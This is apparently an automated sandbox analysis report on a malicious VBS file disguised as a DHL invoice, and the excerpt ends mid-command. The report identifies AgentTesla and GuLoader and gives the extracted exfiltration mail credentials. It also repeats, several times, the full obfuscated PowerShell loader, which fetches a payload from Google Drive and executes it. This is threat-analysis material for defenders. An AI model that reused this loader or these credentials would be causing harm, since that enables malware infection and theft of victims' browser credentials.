Analysis
-
max time kernel
141s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-09-2024 11:18
Static task
static1
Behavioral task
behavioral1
Sample
DHL INVOICE-2356.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DHL INVOICE-2356.vbs
Resource
win10v2004-20240802-en
General
-
Target
DHL INVOICE-2356.vbs
-
Size
43KB
-
MD5
0c816e41fef783ec40ce2d7447d4c5dd
-
SHA1
e0f156439fcba011174f92ef01a4a376b337314d
-
SHA256
b828a42d31cb9bab2620c4c1def73499c542be4f19a802c08e9c0a0971192c3f
-
SHA512
cb93ee840b711ad21cebb8f2d1f98aee087a166c320783de4913bfa70db5118780edd00d5df7712f9473452918f05d2ebad88f23280f10f97ded355b22bab7c3
-
SSDEEP
768:B696nNHECqC68L+iyHNm4WH8xlDeVXQ8MuCzPvbG4O8/MsOAkieqfz7DIKFAR:g9Ge8LP4xxaQhlDDpUssRWnIKFAR
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
marcellinus360 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2800 powershell.exe 5 2800 powershell.exe -
pid Process 2800 powershell.exe 2192 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 8 drive.google.com 2 drive.google.com 3 drive.google.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 api.ipify.org 16 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2524 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2192 powershell.exe 2524 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2192 set thread context of 2524 2192 powershell.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wabmig.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2192 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2800 powershell.exe 2192 powershell.exe 2192 powershell.exe 2524 wabmig.exe 2524 wabmig.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2192 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 2524 wabmig.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2524 wabmig.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2648 wrote to memory of 2800 2648 WScript.exe 30 PID 2648 wrote to memory of 2800 2648 WScript.exe 30 PID 2648 wrote to memory of 2800 2648 WScript.exe 30 PID 2800 wrote to memory of 2912 2800 powershell.exe 32 PID 2800 wrote to memory of 2912 2800 powershell.exe 32 PID 2800 wrote to memory of 2912 2800 powershell.exe 32 PID 2800 wrote to memory of 2584 2800 powershell.exe 34 PID 2800 wrote to memory of 2584 2800 powershell.exe 34 PID 2800 wrote to memory of 2584 2800 powershell.exe 34 PID 2584 wrote to memory of 2192 2584 cmd.exe 35 PID 2584 wrote to memory of 2192 2584 cmd.exe 35 PID 2584 wrote to memory of 2192 2584 cmd.exe 35 PID 2584 wrote to memory of 2192 2584 cmd.exe 35 PID 2192 wrote to memory of 2212 2192 powershell.exe 36 PID 2192 wrote to memory of 2212 2192 powershell.exe 36 PID 2192 wrote to memory of 2212 2192 powershell.exe 36 PID 2192 wrote to memory of 2212 2192 powershell.exe 36 PID 2192 wrote to memory of 2524 2192 powershell.exe 37 PID 2192 wrote to memory of 2524 2192 powershell.exe 37 PID 2192 wrote to memory of 2524 2192 powershell.exe 37 PID 2192 wrote to memory of 2524 2192 powershell.exe 37 PID 2192 wrote to memory of 2524 2192 powershell.exe 37 PID 2192 wrote to memory of 2524 2192 powershell.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL INVOICE-2356.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Antiracial Surrein Capron Underdraft Sixth #>;$Laanebelbets='Skinkels';<#Stabiliserende Amphiptere Wawled Kollaborer Dieselbilerne Kuldeblgernes Electrovection #>;$Trinitrotoluene=$host.PrivateData;If ($Trinitrotoluene) {$Uopnaaelighedens++;}function Unjagged($Stoicheiometry){$Spildevandsomraadernes=$Stoicheiometry.Length-$Uopnaaelighedens;for( $Odalborn=4;$Odalborn -lt $Spildevandsomraadernes;$Odalborn+=5){$Unclannishness+=$Stoicheiometry[$Odalborn];}$Unclannishness;}function hjreafledninger($Reembarcation){ & ($Forvaltningsregler) ($Reembarcation);}$Presystole=Unjagged 'InteMrenaoPandz ,eciudralUdarlAfskaEqu /U.te5Friz. ret0Phyl ,ubc( DogWWhiti PernMaskdGasboArduwKelss Be, Gl tNSv jTSw n S jn1Icic0 Pty.Fald0Vred; Ir, red,WSpili ExinDisa6retr4Puli;Sna, DrosxCoa,6Bygg4 ryd; on BannrHavnv U e: Tje1,ubl2fant1Bdde. Idm0ugun)Hono unmiGSticeSumpcIodik Rego P y/Relo2klie0Stik1 ort0Eddi0 Lis1 pun0Seem1Nuse P,lF CowiTagorPa.aeG,avf ResoRa.ix Ins/,lym1Nond2Tape1Non .,ver0Stor ';$Unadverse51=Unjagged 'NavnuB resPapeeLagerS.mi-W lkAMa.kGSnote dkoN Dert Mun ';$Violen=Unjagged ' Fush S vt xertKaldpMeadsHatt: Cre/Bra /NeapdMiddrOveriundevK nfeBe t.Anstg SkiounhaoFlergFirtlSeleeAlma.St,acM teoindemSpli/CremuPro cKnur?Rebee AttxDis.pChonoOutbrTarstUrfj= ardMagio ReswF,emnKorelforloCalca rupdForg&BraniB udd Tru=Torn1Frikk arg3 Fie-T.epMUsaglD leUBi tA antr Di,qSugg4WalkH DisAFaceXSpisGSamesH naMPaavz Ant5BuddHFdbo4HajedSkkeCPreabNo.pXUnemIK,ipCEudedTran0KbebCRemiWLaculConei Sam ';$Papillary=Unjagged 'Slv >nske ';$Forvaltningsregler=Unjagged 'EpidiAzimETallx Rat ';$Forfaldsdagene='Hebrere';$Vegetabilske = Unjagged 'KapieEti cA cohOblioSvin Hals%Konda StepAf,rpae,md upeau gatgia a T,d%Bran\DoglHLurveAf.anBetrfB laoLr reStr rFen.eCope.BimpFUndiesquemSepa Fo t&Fr m&Rich AnpreSalicUfr hPrizoStra D.pnt Spi ';hjreafledninger (Unjagged 'I ex$Efteg.verlT,sio RefbReenaAflol Tal:BremBForsaCrucnDesikRedra svrsFeltsSh riBomlsLnudt repe PronN yatUpd.=Arch(F dgcF mim ArkdMer Omgr/CambcCobu Fred$.urrV MorePaasgQuese.riatKobbaunrebUforilynelOdmasUnpikKosme isp)Ph l ');hjreafledninger (Unjagged 'Lnst$ Dy.gDuesl RevoTeleb GalaForelMop,:OpmaAuudfg TamrDom aT,mprInjusM li=Bela$ M tVAmatiParaoIcewl nameCa.enHear.Unwis eocpBon lU gei amptBow.( Sp.$O fiP,orsa metpUnyciPseulEccelAegiaLittrconcy,ryp) U d ');hjreafledninger (Unjagged ' Efo[SquiNOptne cidt Jus.W ndSAcroeGyser kitvFortiSummcMe ae ompP MiloAn hiLse,nProdtSlv,M Hvea ArbnMeanaPedigOr.bedelar at],vog: kst:OmveSDyspe .ppcBacku Ab.rTopaiCelltGassy SpiPUnbarKornoKristDataoUn,scEatrorabblNull Vin= luf orni[ PalN Ch,eTomatS.id.TrepS orsevindcSk puHover BefiS ortCoesyVrvlPCi kr avoAntitBilioTorscUnsmo dsvlSemiT An,yDi,lpHabseKlog] eko:Stre:G odT AfslHjtis Sce1Tils2Rage ');$Violen=$Agrars[0];$Strkbandagens= (Unjagged 'Geof$Ba,egKvatl,icroReboB GuaABurll lip:b ndAMycoRFo bIUneaS StiT PeroSolrd Ru.EAlmimC eeO ulacBookRDelmAN neCMi,iiDokueCit SUnc =Abron Stae ,onWStue-nedfOPoetBUnioj,ryseSpecCsareTRhiz HandSNormYVbrisHis TGen E MedMTetr.Fl.sNAkr eJ alT Nep.Red WPatwE.rtibKonvC .onl Do,IBaalEClamNPli T');$Strkbandagens+=$Bankassistent[1];hjreafledninger ($Strkbandagens);hjreafledninger (Unjagged ' Tea$terrASt,tr demiIleas ExotG gao inkdBewheTrafmOl goInfrcUru r nfaFacec dspi upe SitsVand.InveH P eeKri.a ,omdBiskeA derForssOmfo[Imp.$Dec UragenHjreamy md Belv B,neVerdrungks O.jeRegi5cyk 1 pha] ock= R.v$Ant PsewlrfollePhans Spay T.gsGenrtMealo MaulKorre .hi ');$Sexsymbolers=Unjagged 'Milj$Me aAPunkrKom.iKas sMenntBookoRapgdAn,ieHovem Beuo ubec Ri,rMa kaStatcFragiB,sbe VeksCh,l.MisfDUrteoSnftw hrnRee,l TraofireaDrindGuanF Invi u dl ldseIchn(Skri$ImpeVFortiSemio Perl iateEs inapp,, P a$FracS isenLandoThino UngtSeneiChurlFstnyEy.s) Lor ';$Snootily=$Bankassistent[0];hjreafledninger (Unjagged 'Haar$Oms gSpagLPic,o PinBFo daMi rl ,uc:Ky iRBaroAInceaTankFSherR HjrU S.agS jtT mbEUnfunRedn2Outr=A,ch( BehT F neBlgeSBud TKomp-PeliPFredA niTNekrHKomp Fag$ errsLuspn StrOEtfaoRitztDokuITillLRecaYJugg) em ');while (!$Raafrugten2) {hjreafledninger (Unjagged 'Oxli$WringLyd,l hanoL kfbWhifa Horl Pia:EngrE F rlForfiSli.gS geeExper,osseSambrS mm= Pr.$skaet rberKlatuEnkeeOp.a ') ;hjreafledninger $Sexsymbolers;hjreafledninger (Unjagged 'makuSPolytSalga HumrAksitTset-Res.SBondl D seTilfeNa upCin, Ansk4Odon ');hjreafledninger (Unjagged ' idd$SlaggOverl VanoHof.b cheaFro lTil.:RashRq.enaCaiqaStimfEksar .isu LysgTakktResseRedinBal.2Ka.c= .ut(WilgTReste kamsForftSapp- LvePStria ,nctFirehHard Nudd$ Fu SUopkn LacoHe so fortBambiBesml eflyRipt)Paaa ') ;hjreafledninger (Unjagged 'Fejl$ vgtgVoldlTechoKrisb G,uaBinglM ed:BridPSharaVekspYammiShi rAn,lvFejllG nbdT leeSipp= Add$ ensgTekslpairo urbPikna UbelWax :Kom fDe aaUdk lMi ad GrubMissy undd Udl+stat+Abn.% Meg$ClimAprovgTom r.eliaBundrThe.sGobb. Jamc asfoSyntuovn n udltkvie ') ;$Violen=$Agrars[$Papirvlde];}$Storaksen96=299653;$Mouritze=29124;hjreafledninger (Unjagged 'Flle$ReingPortlSo.roSv rbVitaaToksl Acr:po.iSLegacCrysr,iglaSussiPol g RhehInvae UnsdNann Pedr=Bond AbouGSpideBasktBust- IstCMicro Svan KortAfteeTabln LintTro Stru$MizeS IncnEkskoQuaco.blet KoniM,stlRok yLivs ');hjreafledninger (Unjagged 'Nong$Cat gSpinlTredo Supb ataE relyngl:So iAElimnU ebtAndehGarrrThoroMosqpStapoMaskg TraeFi voMonggH nirUbeaaSlaap,orjhA skiVi,lcAss,a Sk,lPja, F b=Paas Afst[OsdiSB,osyH.lss GastJu peDe rmAnsa.SignCEndioTr cnRegnvTu.le Hanr Albt F,l]Felt:De.e:CystF Synr aromusem eliBPl ta Gles,psleLif.6athe4LordS Dect oryrSermiRiannMolggDisq(K.rt$s.ydSSludcCo dr Gala S.fiDirigSa thDefae Ha,dTje ) ils ');hjreafledninger (Unjagged ' Non$ VedgAnkelInteo upebCharaBirclFri.:Sp aGEnteyRechmTetrnC,inaH mis cast H.li S.nkBarrf UnroPrivr H peDippnAfskifl unInspgUnree ncurLorr1Blde3Job 4 Sha Apoq=Rer U ed[MecuSPlysy aksElemtSempe,urtmS,em. SteTThe.eHinsxNredt Fl .SufiE.unknOvincDownoEle d fliiSkrbn InggForb] lde:Suve:ParaA Pr S PraCKoloIUn hISlib.LouiGDe,eeH,ngtTo aSHue t astr Wi,iStign tiegSeki(Jobn$PlunAMi.dnTwistNo.ehCunerTragoG.lepstaro Pl gS iteNatuoC,ung Si,rAldea ConpPre,h.kimi FlicTaalaKuraltvrd)hnse ');hjreafledninger (Unjagged 'Omst$WersgCorolBorto nsbCigaaB,wslAjle:S ylTretse sperEmeem PesoFimbs FintDrawaProntGabboMislv idwn Re e AlgnAs isEndh= O e$Svr,GEsloy vlmAn jnSinka WidsFremtphotiBacokThwafRaafoBetrrB lfeideonAppoiPectnfo,eg EnceDemorNels1Virk3Indr4Forr. ProsSynduelecb Om sKa.kt remrBr niPej,n,leugFors( J h$SvbeSSyg tSpedoVer rNedraSabrk FelsRedneRobanWauk9Isvr6Fi u,Re.s$ ermMTr,vo lekuBiosrlaboiPe.ptAd ez ejeunpo)C tg ');hjreafledninger $Termostatovnens;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Henfoere.Fem && echo t"3⤵PID:2912
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Antiracial Surrein Capron Underdraft Sixth #>;$Laanebelbets='Skinkels';<#Stabiliserende Amphiptere Wawled Kollaborer Dieselbilerne Kuldeblgernes Electrovection #>;$Trinitrotoluene=$host.PrivateData;If ($Trinitrotoluene) {$Uopnaaelighedens++;}function Unjagged($Stoicheiometry){$Spildevandsomraadernes=$Stoicheiometry.Length-$Uopnaaelighedens;for( $Odalborn=4;$Odalborn -lt $Spildevandsomraadernes;$Odalborn+=5){$Unclannishness+=$Stoicheiometry[$Odalborn];}$Unclannishness;}function hjreafledninger($Reembarcation){ & ($Forvaltningsregler) ($Reembarcation);}$Presystole=Unjagged 'InteMrenaoPandz ,eciudralUdarlAfskaEqu /U.te5Friz. ret0Phyl ,ubc( DogWWhiti PernMaskdGasboArduwKelss Be, Gl tNSv jTSw n S jn1Icic0 Pty.Fald0Vred; Ir, red,WSpili ExinDisa6retr4Puli;Sna, DrosxCoa,6Bygg4 ryd; on BannrHavnv U e: Tje1,ubl2fant1Bdde. Idm0ugun)Hono unmiGSticeSumpcIodik Rego P y/Relo2klie0Stik1 ort0Eddi0 Lis1 pun0Seem1Nuse P,lF CowiTagorPa.aeG,avf ResoRa.ix Ins/,lym1Nond2Tape1Non .,ver0Stor ';$Unadverse51=Unjagged 'NavnuB resPapeeLagerS.mi-W lkAMa.kGSnote dkoN Dert Mun ';$Violen=Unjagged ' Fush S vt xertKaldpMeadsHatt: Cre/Bra /NeapdMiddrOveriundevK nfeBe t.Anstg SkiounhaoFlergFirtlSeleeAlma.St,acM teoindemSpli/CremuPro cKnur?Rebee AttxDis.pChonoOutbrTarstUrfj= ardMagio ReswF,emnKorelforloCalca rupdForg&BraniB udd Tru=Torn1Frikk arg3 Fie-T.epMUsaglD leUBi tA antr Di,qSugg4WalkH DisAFaceXSpisGSamesH naMPaavz Ant5BuddHFdbo4HajedSkkeCPreabNo.pXUnemIK,ipCEudedTran0KbebCRemiWLaculConei Sam ';$Papillary=Unjagged 'Slv >nske ';$Forvaltningsregler=Unjagged 'EpidiAzimETallx Rat ';$Forfaldsdagene='Hebrere';$Vegetabilske = Unjagged 'KapieEti cA cohOblioSvin Hals%Konda StepAf,rpae,md upeau gatgia a T,d%Bran\DoglHLurveAf.anBetrfB laoLr reStr rFen.eCope.BimpFUndiesquemSepa Fo t&Fr m&Rich AnpreSalicUfr hPrizoStra D.pnt Spi ';hjreafledninger (Unjagged 'I ex$Efteg.verlT,sio RefbReenaAflol Tal:BremBForsaCrucnDesikRedra svrsFeltsSh riBomlsLnudt repe PronN yatUpd.=Arch(F dgcF mim ArkdMer Omgr/CambcCobu Fred$.urrV MorePaasgQuese.riatKobbaunrebUforilynelOdmasUnpikKosme isp)Ph l ');hjreafledninger (Unjagged 'Lnst$ Dy.gDuesl RevoTeleb GalaForelMop,:OpmaAuudfg TamrDom aT,mprInjusM li=Bela$ M tVAmatiParaoIcewl nameCa.enHear.Unwis eocpBon lU gei amptBow.( Sp.$O fiP,orsa metpUnyciPseulEccelAegiaLittrconcy,ryp) U d ');hjreafledninger (Unjagged ' Efo[SquiNOptne cidt Jus.W ndSAcroeGyser kitvFortiSummcMe ae ompP MiloAn hiLse,nProdtSlv,M Hvea ArbnMeanaPedigOr.bedelar at],vog: kst:OmveSDyspe .ppcBacku Ab.rTopaiCelltGassy SpiPUnbarKornoKristDataoUn,scEatrorabblNull Vin= luf orni[ PalN Ch,eTomatS.id.TrepS orsevindcSk puHover BefiS ortCoesyVrvlPCi kr avoAntitBilioTorscUnsmo dsvlSemiT An,yDi,lpHabseKlog] eko:Stre:G odT AfslHjtis Sce1Tils2Rage ');$Violen=$Agrars[0];$Strkbandagens= (Unjagged 'Geof$Ba,egKvatl,icroReboB GuaABurll lip:b ndAMycoRFo bIUneaS StiT PeroSolrd Ru.EAlmimC eeO ulacBookRDelmAN neCMi,iiDokueCit SUnc =Abron Stae ,onWStue-nedfOPoetBUnioj,ryseSpecCsareTRhiz HandSNormYVbrisHis TGen E MedMTetr.Fl.sNAkr eJ alT Nep.Red WPatwE.rtibKonvC .onl Do,IBaalEClamNPli T');$Strkbandagens+=$Bankassistent[1];hjreafledninger ($Strkbandagens);hjreafledninger (Unjagged ' Tea$terrASt,tr demiIleas ExotG gao inkdBewheTrafmOl goInfrcUru r nfaFacec dspi upe SitsVand.InveH P eeKri.a ,omdBiskeA derForssOmfo[Imp.$Dec UragenHjreamy md Belv B,neVerdrungks O.jeRegi5cyk 1 pha] ock= R.v$Ant PsewlrfollePhans Spay T.gsGenrtMealo MaulKorre .hi ');$Sexsymbolers=Unjagged 'Milj$Me aAPunkrKom.iKas sMenntBookoRapgdAn,ieHovem Beuo ubec Ri,rMa kaStatcFragiB,sbe VeksCh,l.MisfDUrteoSnftw hrnRee,l TraofireaDrindGuanF Invi u dl ldseIchn(Skri$ImpeVFortiSemio Perl iateEs inapp,, P a$FracS isenLandoThino UngtSeneiChurlFstnyEy.s) Lor ';$Snootily=$Bankassistent[0];hjreafledninger (Unjagged 'Haar$Oms gSpagLPic,o PinBFo daMi rl ,uc:Ky iRBaroAInceaTankFSherR HjrU S.agS jtT mbEUnfunRedn2Outr=A,ch( BehT F neBlgeSBud TKomp-PeliPFredA niTNekrHKomp Fag$ errsLuspn StrOEtfaoRitztDokuITillLRecaYJugg) em ');while (!$Raafrugten2) {hjreafledninger (Unjagged 'Oxli$WringLyd,l hanoL kfbWhifa Horl Pia:EngrE F rlForfiSli.gS geeExper,osseSambrS mm= Pr.$skaet rberKlatuEnkeeOp.a ') ;hjreafledninger $Sexsymbolers;hjreafledninger (Unjagged 'makuSPolytSalga HumrAksitTset-Res.SBondl D seTilfeNa upCin, Ansk4Odon ');hjreafledninger (Unjagged ' idd$SlaggOverl VanoHof.b cheaFro lTil.:RashRq.enaCaiqaStimfEksar .isu LysgTakktResseRedinBal.2Ka.c= .ut(WilgTReste kamsForftSapp- LvePStria ,nctFirehHard Nudd$ Fu SUopkn LacoHe so fortBambiBesml eflyRipt)Paaa ') ;hjreafledninger (Unjagged 'Fejl$ vgtgVoldlTechoKrisb G,uaBinglM ed:BridPSharaVekspYammiShi rAn,lvFejllG nbdT leeSipp= Add$ ensgTekslpairo urbPikna UbelWax :Kom fDe aaUdk lMi ad GrubMissy undd Udl+stat+Abn.% Meg$ClimAprovgTom r.eliaBundrThe.sGobb. Jamc asfoSyntuovn n udltkvie ') ;$Violen=$Agrars[$Papirvlde];}$Storaksen96=299653;$Mouritze=29124;hjreafledninger (Unjagged 'Flle$ReingPortlSo.roSv rbVitaaToksl Acr:po.iSLegacCrysr,iglaSussiPol g RhehInvae UnsdNann Pedr=Bond AbouGSpideBasktBust- IstCMicro Svan KortAfteeTabln LintTro Stru$MizeS IncnEkskoQuaco.blet KoniM,stlRok yLivs ');hjreafledninger (Unjagged 'Nong$Cat gSpinlTredo Supb ataE relyngl:So iAElimnU ebtAndehGarrrThoroMosqpStapoMaskg TraeFi voMonggH nirUbeaaSlaap,orjhA skiVi,lcAss,a Sk,lPja, F b=Paas Afst[OsdiSB,osyH.lss GastJu peDe rmAnsa.SignCEndioTr cnRegnvTu.le Hanr Albt F,l]Felt:De.e:CystF Synr aromusem eliBPl ta Gles,psleLif.6athe4LordS Dect oryrSermiRiannMolggDisq(K.rt$s.ydSSludcCo dr Gala S.fiDirigSa thDefae Ha,dTje ) ils ');hjreafledninger (Unjagged ' Non$ VedgAnkelInteo upebCharaBirclFri.:Sp aGEnteyRechmTetrnC,inaH mis cast H.li S.nkBarrf UnroPrivr H peDippnAfskifl unInspgUnree ncurLorr1Blde3Job 4 Sha Apoq=Rer U ed[MecuSPlysy aksElemtSempe,urtmS,em. SteTThe.eHinsxNredt Fl .SufiE.unknOvincDownoEle d fliiSkrbn InggForb] lde:Suve:ParaA Pr S PraCKoloIUn hISlib.LouiGDe,eeH,ngtTo aSHue t astr Wi,iStign tiegSeki(Jobn$PlunAMi.dnTwistNo.ehCunerTragoG.lepstaro Pl gS iteNatuoC,ung Si,rAldea ConpPre,h.kimi FlicTaalaKuraltvrd)hnse ');hjreafledninger (Unjagged 'Omst$WersgCorolBorto nsbCigaaB,wslAjle:S ylTretse sperEmeem PesoFimbs FintDrawaProntGabboMislv idwn Re e AlgnAs isEndh= O e$Svr,GEsloy vlmAn jnSinka WidsFremtphotiBacokThwafRaafoBetrrB lfeideonAppoiPectnfo,eg EnceDemorNels1Virk3Indr4Forr. ProsSynduelecb Om sKa.kt remrBr niPej,n,leugFors( J h$SvbeSSyg tSpedoVer rNedraSabrk FelsRedneRobanWauk9Isvr6Fi u,Re.s$ ermMTr,vo lekuBiosrlaboiPe.ptAd ez ejeunpo)C tg ');hjreafledninger $Termostatovnens;"3⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Antiracial Surrein Capron Underdraft Sixth #>;$Laanebelbets='Skinkels';<#Stabiliserende Amphiptere Wawled Kollaborer Dieselbilerne Kuldeblgernes Electrovection #>;$Trinitrotoluene=$host.PrivateData;If ($Trinitrotoluene) {$Uopnaaelighedens++;}function Unjagged($Stoicheiometry){$Spildevandsomraadernes=$Stoicheiometry.Length-$Uopnaaelighedens;for( $Odalborn=4;$Odalborn -lt $Spildevandsomraadernes;$Odalborn+=5){$Unclannishness+=$Stoicheiometry[$Odalborn];}$Unclannishness;}function hjreafledninger($Reembarcation){ & ($Forvaltningsregler) ($Reembarcation);}$Presystole=Unjagged 'InteMrenaoPandz ,eciudralUdarlAfskaEqu /U.te5Friz. ret0Phyl ,ubc( DogWWhiti PernMaskdGasboArduwKelss Be, Gl tNSv jTSw n S jn1Icic0 Pty.Fald0Vred; Ir, red,WSpili ExinDisa6retr4Puli;Sna, DrosxCoa,6Bygg4 ryd; on BannrHavnv U e: Tje1,ubl2fant1Bdde. Idm0ugun)Hono unmiGSticeSumpcIodik Rego P y/Relo2klie0Stik1 ort0Eddi0 Lis1 pun0Seem1Nuse P,lF CowiTagorPa.aeG,avf ResoRa.ix Ins/,lym1Nond2Tape1Non .,ver0Stor ';$Unadverse51=Unjagged 'NavnuB resPapeeLagerS.mi-W lkAMa.kGSnote dkoN Dert Mun ';$Violen=Unjagged ' Fush S vt xertKaldpMeadsHatt: Cre/Bra /NeapdMiddrOveriundevK nfeBe t.Anstg SkiounhaoFlergFirtlSeleeAlma.St,acM teoindemSpli/CremuPro cKnur?Rebee AttxDis.pChonoOutbrTarstUrfj= ardMagio ReswF,emnKorelforloCalca rupdForg&BraniB udd Tru=Torn1Frikk arg3 Fie-T.epMUsaglD leUBi tA antr Di,qSugg4WalkH DisAFaceXSpisGSamesH naMPaavz Ant5BuddHFdbo4HajedSkkeCPreabNo.pXUnemIK,ipCEudedTran0KbebCRemiWLaculConei Sam ';$Papillary=Unjagged 'Slv >nske ';$Forvaltningsregler=Unjagged 'EpidiAzimETallx Rat ';$Forfaldsdagene='Hebrere';$Vegetabilske = Unjagged 'KapieEti cA cohOblioSvin Hals%Konda StepAf,rpae,md upeau gatgia a T,d%Bran\DoglHLurveAf.anBetrfB laoLr reStr rFen.eCope.BimpFUndiesquemSepa Fo t&Fr m&Rich AnpreSalicUfr hPrizoStra D.pnt Spi ';hjreafledninger (Unjagged 'I ex$Efteg.verlT,sio RefbReenaAflol Tal:BremBForsaCrucnDesikRedra svrsFeltsSh riBomlsLnudt repe PronN yatUpd.=Arch(F dgcF mim ArkdMer Omgr/CambcCobu Fred$.urrV MorePaasgQuese.riatKobbaunrebUforilynelOdmasUnpikKosme isp)Ph l ');hjreafledninger (Unjagged 'Lnst$ Dy.gDuesl RevoTeleb GalaForelMop,:OpmaAuudfg TamrDom aT,mprInjusM li=Bela$ M tVAmatiParaoIcewl nameCa.enHear.Unwis eocpBon lU gei amptBow.( Sp.$O fiP,orsa metpUnyciPseulEccelAegiaLittrconcy,ryp) U d ');hjreafledninger (Unjagged ' Efo[SquiNOptne cidt Jus.W ndSAcroeGyser kitvFortiSummcMe ae ompP MiloAn hiLse,nProdtSlv,M Hvea ArbnMeanaPedigOr.bedelar at],vog: kst:OmveSDyspe .ppcBacku Ab.rTopaiCelltGassy SpiPUnbarKornoKristDataoUn,scEatrorabblNull Vin= luf orni[ PalN Ch,eTomatS.id.TrepS orsevindcSk puHover BefiS ortCoesyVrvlPCi kr avoAntitBilioTorscUnsmo dsvlSemiT An,yDi,lpHabseKlog] eko:Stre:G odT AfslHjtis Sce1Tils2Rage ');$Violen=$Agrars[0];$Strkbandagens= (Unjagged 'Geof$Ba,egKvatl,icroReboB GuaABurll lip:b ndAMycoRFo bIUneaS StiT PeroSolrd Ru.EAlmimC eeO ulacBookRDelmAN neCMi,iiDokueCit SUnc =Abron Stae ,onWStue-nedfOPoetBUnioj,ryseSpecCsareTRhiz HandSNormYVbrisHis TGen E MedMTetr.Fl.sNAkr eJ alT Nep.Red WPatwE.rtibKonvC .onl Do,IBaalEClamNPli T');$Strkbandagens+=$Bankassistent[1];hjreafledninger ($Strkbandagens);hjreafledninger (Unjagged ' Tea$terrASt,tr demiIleas ExotG gao inkdBewheTrafmOl goInfrcUru r nfaFacec dspi upe SitsVand.InveH P eeKri.a ,omdBiskeA derForssOmfo[Imp.$Dec UragenHjreamy md Belv B,neVerdrungks O.jeRegi5cyk 1 pha] ock= R.v$Ant PsewlrfollePhans Spay T.gsGenrtMealo MaulKorre .hi ');$Sexsymbolers=Unjagged 'Milj$Me aAPunkrKom.iKas sMenntBookoRapgdAn,ieHovem Beuo ubec Ri,rMa kaStatcFragiB,sbe VeksCh,l.MisfDUrteoSnftw hrnRee,l TraofireaDrindGuanF Invi u dl ldseIchn(Skri$ImpeVFortiSemio Perl iateEs inapp,, P a$FracS isenLandoThino UngtSeneiChurlFstnyEy.s) Lor ';$Snootily=$Bankassistent[0];hjreafledninger (Unjagged 'Haar$Oms gSpagLPic,o PinBFo daMi rl ,uc:Ky iRBaroAInceaTankFSherR HjrU S.agS jtT mbEUnfunRedn2Outr=A,ch( BehT F neBlgeSBud TKomp-PeliPFredA niTNekrHKomp Fag$ errsLuspn StrOEtfaoRitztDokuITillLRecaYJugg) em ');while (!$Raafrugten2) {hjreafledninger (Unjagged 'Oxli$WringLyd,l hanoL kfbWhifa Horl Pia:EngrE F rlForfiSli.gS geeExper,osseSambrS mm= Pr.$skaet rberKlatuEnkeeOp.a ') ;hjreafledninger $Sexsymbolers;hjreafledninger (Unjagged 'makuSPolytSalga HumrAksitTset-Res.SBondl D seTilfeNa upCin, Ansk4Odon ');hjreafledninger (Unjagged ' idd$SlaggOverl VanoHof.b cheaFro lTil.:RashRq.enaCaiqaStimfEksar .isu LysgTakktResseRedinBal.2Ka.c= .ut(WilgTReste kamsForftSapp- LvePStria ,nctFirehHard Nudd$ Fu SUopkn LacoHe so fortBambiBesml eflyRipt)Paaa ') ;hjreafledninger (Unjagged 'Fejl$ vgtgVoldlTechoKrisb G,uaBinglM ed:BridPSharaVekspYammiShi rAn,lvFejllG nbdT leeSipp= Add$ ensgTekslpairo urbPikna UbelWax :Kom fDe aaUdk lMi ad GrubMissy undd Udl+stat+Abn.% Meg$ClimAprovgTom r.eliaBundrThe.sGobb. Jamc asfoSyntuovn n udltkvie ') ;$Violen=$Agrars[$Papirvlde];}$Storaksen96=299653;$Mouritze=29124;hjreafledninger (Unjagged 